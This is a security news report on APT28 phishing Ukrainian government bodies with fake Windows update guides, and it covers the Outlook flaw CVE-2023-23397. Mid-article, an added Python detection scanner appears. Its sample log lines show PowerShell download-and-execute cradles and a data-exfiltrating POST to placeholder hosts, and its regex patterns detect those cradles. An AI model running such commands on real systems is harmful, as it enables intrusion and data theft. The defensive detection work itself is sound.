Hackers use fake ‘Windows Update’ guides to target Ukrainian govt
2023-04-30 14:07

The Computer Emergency Response Team of Ukraine says Russian hackers are targeting various government bodies in the country with malicious emails supposedly containing instructions on how to update Windows as a defense against cyber attacks.

Instead of legitimate instructions on upgrading Windows systems, the malicious emails advise the recipients to run a PowerShell command.

This command downloads a PowerShell script onto the computer that simulates a Windows update process while fetching a second PowerShell payload in the background.

Mocky is a legitimate service for generating custom HTTP responses; in this campaign, APT28 abused it for data exfiltration.
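As a defender-side illustration of the pattern described above (a remote fetch chained into in-memory execution, plus web POSTs that could carry exfiltrated data), here is a small scanner over PowerShell script-block log entries. It is an added example, not code from CERT-UA or the article; the event ids, script text and endpoint names are all constructed.

```python
import re

# Constructed sample of PowerShell script-block log entries (Event ID 4104,
# Microsoft-Windows-PowerShell/Operational). Invented for this example; none
# of these lines come from the CERT-UA report or the article.
SAMPLE_EVENTS = [
    {"id": 1, "script": "Get-WindowsUpdate -Install -AcceptAll"},
    {"id": 2, "script": "iex (iwr 'https://example.invalid/update.ps1' -UseBasicParsing).Content"},
    {"id": 3, "script": "$w = New-Object Net.WebClient; Invoke-Expression $w.DownloadString('http://example.invalid/a')"},
    {"id": 4, "script": "Invoke-WebRequest https://example.invalid/readme.txt -OutFile readme.txt"},
    {"id": 5, "script": "Invoke-RestMethod -Uri 'https://mock-api.example.invalid/v3/abc' -Method Post -Body $out"},
]

# Remote-fetch primitives and cmdlet aliases commonly seen in download cradles.
FETCH_RE = re.compile(
    r"(?i)\b(iwr|irm|curl|wget|Invoke-WebRequest|Invoke-RestMethod|"
    r"DownloadString|DownloadData|DownloadFile|Net\.WebClient|WebRequest)\b")
# In-memory execution of whatever was fetched.
EXEC_RE = re.compile(r"(?i)(\biex\b|Invoke-Expression|\[scriptblock\]::Create|Invoke-Command)")
# Outbound delivery of local data to a web endpoint (what a mock-response
# service abused for exfiltration would receive).
UPLOAD_RE = re.compile(r"(?i)(-Method\s+Post\b|UploadString|UploadData|UploadFile|-InFile\b|-Body\b)")


def classify(script: str) -> list[str]:
    """Return the reasons a script block is suspicious (empty list if none)."""
    fetch = FETCH_RE.search(script)
    if not fetch:
        return []
    if EXEC_RE.search(script):
        return ["download-and-execute"]   # fetch chained straight into execution
    if UPLOAD_RE.search(script):
        return ["outbound-post"]          # possible exfiltration over HTTP
    return ["remote-fetch"]               # low confidence on its own


def scan(events) -> dict[int, list[str]]:
    """Map event id -> reasons, for every event that triggered at least one rule."""
    return {e["id"]: r for e in events if (r := classify(e["script"]))}


if __name__ == "__main__":
    for event_id, reasons in scan(SAMPLE_EVENTS).items():
        print(f"event {event_id}: {', '.join(reasons)}")
```

A real deployment would read the 4104 ScriptBlockText field and treat "remote-fetch" hits as context for the higher-confidence rules rather than alerting on them alone.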

In March 2023, Microsoft patched an Outlook zero-day vulnerability tracked as CVE-2023-23397, which APT28 has exploited since April 2022 to breach the networks of European government, military, energy, and transportation organizations.

Interestingly, Chinese hackers also used Windows updates as a lure to drop malicious executables in attacks against Russian government agencies last year.


News URL

https://www.bleepingcomputer.com/news/security/hackers-use-fake-windows-update-guides-to-target-ukrainian-govt/

Related Vulnerability

DATE:                2023-03-14
CVE:                 CVE-2023-23397
VULNERABILITY TITLE: Authentication Bypass by Capture-replay vulnerability in Microsoft products (Microsoft Outlook Elevation of Privilege Vulnerability)
RISK:                network, low complexity, vendor microsoft, CWE-294, critical (9.8)